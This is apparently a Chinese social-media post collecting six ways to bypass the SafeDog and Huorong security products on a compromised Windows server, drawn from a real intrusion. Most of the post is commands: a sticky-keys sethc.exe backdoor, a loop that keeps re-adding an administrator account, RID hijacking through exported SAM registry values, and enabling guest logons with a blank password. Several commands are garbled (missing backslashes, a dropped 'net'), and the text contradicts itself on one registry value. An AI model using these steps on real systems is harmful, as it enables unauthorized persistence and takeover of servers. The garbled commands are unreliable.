点击蓝字,关注我们
源于一次渗透测试,服务器有狗和火绒,经过查阅资料学习,终于把目标服务器干掉。这么好的资料就拿出来分享给大家,资料均网上整理的打狗棍法。以下方法针对CS和msf等方式读不出密码的方法(原因管理员已经好几个月没登陆,密码早就不在内存里了)
打法一:
system权限下直接执行K狗工具,k掉安全狗的防御(老版本的安全狗有效,新版不行)
打法二:
上传shift后门,(有可能被拦截)直接复制
copy C:sethc.exe C:windowssystem32sethc.exe
copy C:windowssystem32sethc.exe C:windowssystem32dllcachesethc.exe
或者注册表劫持,修改压缩包里面注册表里面文件的路径
打法三:
在net1没禁用的情况下,安全狗的拦截加账户,是每两秒检测一次保护的用户组,检测到新添加的就会删除,我们可以利用的就是他这个两秒时间,利用for循环来不断的加帐号,一直加,他一直删,我们能进入服务器,不是么?执行100次加账户的命令,
for /l %%i in (1,1,100) do user asphxg asphxg /add& localgroup administrators asphxg /add
打法四:
首先,用guest,演示一下,具体操作是通过注册表,篡改sam下用户的F值,使其达到管理权限.
首先,你必须有可以提权的exp,使自己达到system权限,大家都知道,administrator对应值是1F4,GUEST是1F5,如果有例外,下面会讲到。
下面是步骤:
1.使用net1 user guset 1 ,将guest密码重置为1,无需过问是guest否禁用
2.执行:reg export "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers 00001F4" "C:RECYCLER1.reg"
导出administrator的注册表值到某路径,修改内容,将"V"值删除,只留F值,将1F4修改为1F5,保存。
3.执行regedit /s C:RECYCLER1.reg 导入注册表
就可以使用,guest 密码 1登陆了。
如果不给修改密码,那么还有两个棍法!
打法五:
如果真的不能更改密码呢?则使用vbs查看iis用户密码,再使用
reg export
1."HKEY_LOCAL_MACHINESAMSAMDomainsAccountnames用户名" "C:2.reg"
2.执行:reg export "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers 00001F4" "C:RECYCLER1.reg"
导出administrator的注册表值到某路径,修改内容,将"V"值删除,只留F值,将1F4修改为1F5,保存。
3.执行regedit /s C:RECYCLER1.reg 导入注册表
如果不允许修改密码,iis用户是禁止登陆远程桌面的呢?
打法6:
激活guest用户,使用空密码登录。步骤:
1.net user guest /active:yes启用guest
2.reg add HKLMSYSTEMCurrentControlSetControlLsa /v limitblankpassworduse /t REG_DWORD /d 0 /f修改limitblankpassworduse值为1,
3.执行:reg export "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers 00001F4" "C:RECYCLER1.reg"
导出administrator的注册表值到某路径,修改内容,将"V"值删除,只留F值,将1F4修改为1F5,保存。
4.执行regedit /s C:RECYCLER1.reg 导入注册表
如果碰到火绒,几乎不能创建账号和更改密码,但是可以把已有的账号添加到管理组!所以棍法6好打,上个图,成功打掉!
该文章源于网络整理,如有侵权,请联系小编~还没进群的伙伴,加小编找大部队
文章声明:本文仅供学习参考,请勿非法使用!
扫二维码|关注我们
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论